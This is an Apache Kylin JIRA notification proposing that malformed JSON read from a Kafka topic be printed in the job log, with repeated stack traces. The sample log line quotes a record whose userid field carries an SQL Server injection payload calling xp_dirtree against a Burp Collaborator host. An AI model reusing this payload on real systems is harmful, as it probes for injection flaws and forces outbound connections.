[
https://issues.apache.org/jira/browse/KYLIN-3767?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
]
Temple Zhou updated KYLIN-3767:
-------------------------------
Description:
Recently, I found that my cube with streaming data built failed, so I checked
the syslog in the failed MR job.
But the log contents didn't help, which is as follows:
{code:java}
2019-01-11 15:12:48,774 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537268
2019-01-11 15:12:48,776 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537768
2019-01-11 15:12:48,778 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
2019-01-11 15:12:48,781 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
2019-01-11 15:12:48,783 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
2019-01-11 15:12:48,787 ERROR [main]
org.apache.kylin.source.kafka.TimedJsonStreamParser: error
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException:
Unrecognized character escape 'h' (code 104)
at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line:
1, column: 207]
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:663)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._handleUnrecognizedCharacterEscape(ParserMinimalBase.java:640)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._decodeEscaped(UTF8StreamJsonParser.java:3243)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishString2(UTF8StreamJsonParser.java:2452)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishAndReturnString(UTF8StreamJsonParser.java:2407)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser.getText(UTF8StreamJsonParser.java:269)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserialize(UntypedObjectDeserializer.java:672)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer._readAndBindStringKeyMap(MapDeserializer.java:527)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:364)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:29)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4001)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3072)
at
org.apache.kylin.source.kafka.TimedJsonStreamParser.parse(TimedJsonStreamParser.java:112)
at
org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:87)
at
org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:48)
at org.apache.kylin.engine.mr.KylinMapper.map(KylinMapper.java:77)
at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:145)
at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:793)
at org.apache.hadoop.mapred.MapTask.run(MapTask.java:341)
at org.apache.hadoop.mapred.YarnChild$2.run(YarnChild.java:164)
at java.security.AccessController.doPrivileged(Native Method)
at javax.security.auth.Subject.doAs(Subject.java:422)
at
org.apache.hadoop.security.UserGroupInformation.doAs(UserGroupInformation.java:1917)
at org.apache.hadoop.mapred.YarnChild.main(YarnChild.java:158)
{code}
Maybe, the malformed json data should be printed in the syslog, which can help
me to troubleshooting.
Just like that:
{code:java}
...
2019-01-11 15:12:48,778 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
2019-01-11 15:12:48,781 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
2019-01-11 15:12:48,783 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
2019-01-11 15:12:48,785 ERROR [main]
org.apache.kylin.source.kafka.TimedJsonStreamParser: malformed data:
{"site":"10010-2","channel":"3","atime":1547119709319,"userid":"909c1c003ee825fc57c9d1fb20f279091547119221751;declare
@q varchar(99);set
@q='\\9jtdffd7wspm21e6llv88xu6pxvrji960tyhn.burpcollab'+'orator.net\hsh'; exec
master.dbo.xp_dirtree @q;-- "}
2019-01-11 15:12:48,787 ERROR [main]
org.apache.kylin.source.kafka.TimedJsonStreamParser: error
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException:
Unrecognized character escape 'h' (code 104)
at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line:
1, column: 207]
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
...
{code}
was:
Print the malformed JSON data consumed from Kafka Topic
Recently, I found that my cube with streaming data built failed, so I checked
the syslog in the failed MR job.
But the log contents didn't help, which is as follows:
{code:java}
2019-01-11 15:12:48,774 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537268
2019-01-11 15:12:48,776 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537768
2019-01-11 15:12:48,778 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
2019-01-11 15:12:48,781 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
2019-01-11 15:12:48,783 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
2019-01-11 15:12:48,787 ERROR [main]
org.apache.kylin.source.kafka.TimedJsonStreamParser: error
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException:
Unrecognized character escape 'h' (code 104)
at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line:
1, column: 207]
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:663)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._handleUnrecognizedCharacterEscape(ParserMinimalBase.java:640)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._decodeEscaped(UTF8StreamJsonParser.java:3243)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishString2(UTF8StreamJsonParser.java:2452)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishAndReturnString(UTF8StreamJsonParser.java:2407)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser.getText(UTF8StreamJsonParser.java:269)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserialize(UntypedObjectDeserializer.java:672)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer._readAndBindStringKeyMap(MapDeserializer.java:527)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:364)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:29)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4001)
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3072)
at
org.apache.kylin.source.kafka.TimedJsonStreamParser.parse(TimedJsonStreamParser.java:112)
at
org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:87)
at
org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:48)
at org.apache.kylin.engine.mr.KylinMapper.map(KylinMapper.java:77)
at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:145)
at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:793)
at org.apache.hadoop.mapred.MapTask.run(MapTask.java:341)
at org.apache.hadoop.mapred.YarnChild$2.run(YarnChild.java:164)
at java.security.AccessController.doPrivileged(Native Method)
at javax.security.auth.Subject.doAs(Subject.java:422)
at
org.apache.hadoop.security.UserGroupInformation.doAs(UserGroupInformation.java:1917)
at org.apache.hadoop.mapred.YarnChild.main(YarnChild.java:158)
{code}
Maybe, the malformed json data should be printed in the syslog, which can help
me to troubleshooting.
Just like that:
{code:java}
...
2019-01-11 15:12:48,778 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
2019-01-11 15:12:48,781 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
2019-01-11 15:12:48,783 INFO [main]
org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
2019-01-11 15:12:48,785 ERROR [main]
org.apache.kylin.source.kafka.TimedJsonStreamParser: malformed data:
{"site":"10010-2","channel":"3","atime":1547119709319,"userid":"909c1c003ee825fc57c9d1fb20f279091547119221751;declare
@q varchar(99);set
@q='\\9jtdffd7wspm21e6llv88xu6pxvrji960tyhn.burpcollab'+'orator.net\hsh'; exec
master.dbo.xp_dirtree @q;-- "}
2019-01-11 15:12:48,787 ERROR [main]
org.apache.kylin.source.kafka.TimedJsonStreamParser: error
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException:
Unrecognized character escape 'h' (code 104)
at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream); line:
1, column: 207]
at
org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
...
{code}
> Print the malformed JSON data consumed from Kafka Topic
> -------------------------------------------------------
>
> Key: KYLIN-3767
> URL: https://issues.apache.org/jira/browse/KYLIN-3767
> Project: Kylin
> Issue Type: Improvement
> Components: Job Engine
> Affects Versions: v2.2.0, v2.3.0, v2.4.0
> Reporter: Temple Zhou
> Assignee: Temple Zhou
> Priority: Major
> Attachments: KYLIN-3767.master.001.patch
>
>
> Recently, I found that my cube with streaming data built failed, so I checked
> the syslog in the failed MR job.
> But the log contents didn't help, which is as follows:
> {code:java}
> 2019-01-11 15:12:48,774 INFO [main]
> org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
> kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537268
> 2019-01-11 15:12:48,776 INFO [main]
> org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
> kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1537768
> 2019-01-11 15:12:48,778 INFO [main]
> org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
> kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
> 2019-01-11 15:12:48,781 INFO [main]
> org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
> kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
> 2019-01-11 15:12:48,783 INFO [main]
> org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
> kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
> 2019-01-11 15:12:48,787 ERROR [main]
> org.apache.kylin.source.kafka.TimedJsonStreamParser: error
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException:
> Unrecognized character escape 'h' (code 104)
> at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream);
> line: 1, column: 207]
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:663)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.base.ParserMinimalBase._handleUnrecognizedCharacterEscape(ParserMinimalBase.java:640)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._decodeEscaped(UTF8StreamJsonParser.java:3243)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishString2(UTF8StreamJsonParser.java:2452)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser._finishAndReturnString(UTF8StreamJsonParser.java:2407)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.json.UTF8StreamJsonParser.getText(UTF8StreamJsonParser.java:269)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.UntypedObjectDeserializer$Vanilla.deserialize(UntypedObjectDeserializer.java:672)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer._readAndBindStringKeyMap(MapDeserializer.java:527)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:364)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.deser.std.MapDeserializer.deserialize(MapDeserializer.java:29)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper._readMapAndClose(ObjectMapper.java:4001)
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.databind.ObjectMapper.readValue(ObjectMapper.java:3072)
> at
> org.apache.kylin.source.kafka.TimedJsonStreamParser.parse(TimedJsonStreamParser.java:112)
> at
> org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:87)
> at
> org.apache.kylin.source.kafka.hadoop.KafkaFlatTableMapper.doMap(KafkaFlatTableMapper.java:48)
> at org.apache.kylin.engine.mr.KylinMapper.map(KylinMapper.java:77)
> at org.apache.hadoop.mapreduce.Mapper.run(Mapper.java:145)
> at org.apache.hadoop.mapred.MapTask.runNewMapper(MapTask.java:793)
> at org.apache.hadoop.mapred.MapTask.run(MapTask.java:341)
> at org.apache.hadoop.mapred.YarnChild$2.run(YarnChild.java:164)
> at java.security.AccessController.doPrivileged(Native Method)
> at javax.security.auth.Subject.doAs(Subject.java:422)
> at
> org.apache.hadoop.security.UserGroupInformation.doAs(UserGroupInformation.java:1917)
> at org.apache.hadoop.mapred.YarnChild.main(YarnChild.java:158)
> {code}
> Maybe, the malformed json data should be printed in the syslog, which can
> help me to troubleshooting.
> Just like that:
> {code:java}
> ...
> 2019-01-11 15:12:48,778 INFO [main]
> org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
> kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538268
> 2019-01-11 15:12:48,781 INFO [main]
> org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
> kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1538768
> 2019-01-11 15:12:48,783 INFO [main]
> org.apache.kylin.source.kafka.hadoop.KafkaInputRecordReader:
> kylin-full-site-pvuv:kafka4:9092:2 fetching offset 1539268
> 2019-01-11 15:12:48,785 ERROR [main]
> org.apache.kylin.source.kafka.TimedJsonStreamParser: malformed data:
> {"site":"10010-2","channel":"3","atime":1547119709319,"userid":"909c1c003ee825fc57c9d1fb20f279091547119221751;declare
> @q varchar(99);set
> @q='\\9jtdffd7wspm21e6llv88xu6pxvrji960tyhn.burpcollab'+'orator.net\hsh';
> exec master.dbo.xp_dirtree @q;-- "}
> 2019-01-11 15:12:48,787 ERROR [main]
> org.apache.kylin.source.kafka.TimedJsonStreamParser: error
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParseException:
> Unrecognized character escape 'h' (code 104)
> at [Source: (org.apache.kylin.common.util.ByteBufferBackedInputStream);
> line: 1, column: 207]
> at
> org.apache.kylin.job.shaded.com.fasterxml.jackson.core.JsonParser._constructError(JsonParser.java:1804)
> ...
> {code}
--
This message was sent by Atlassian JIRA
(v7.6.3#76005)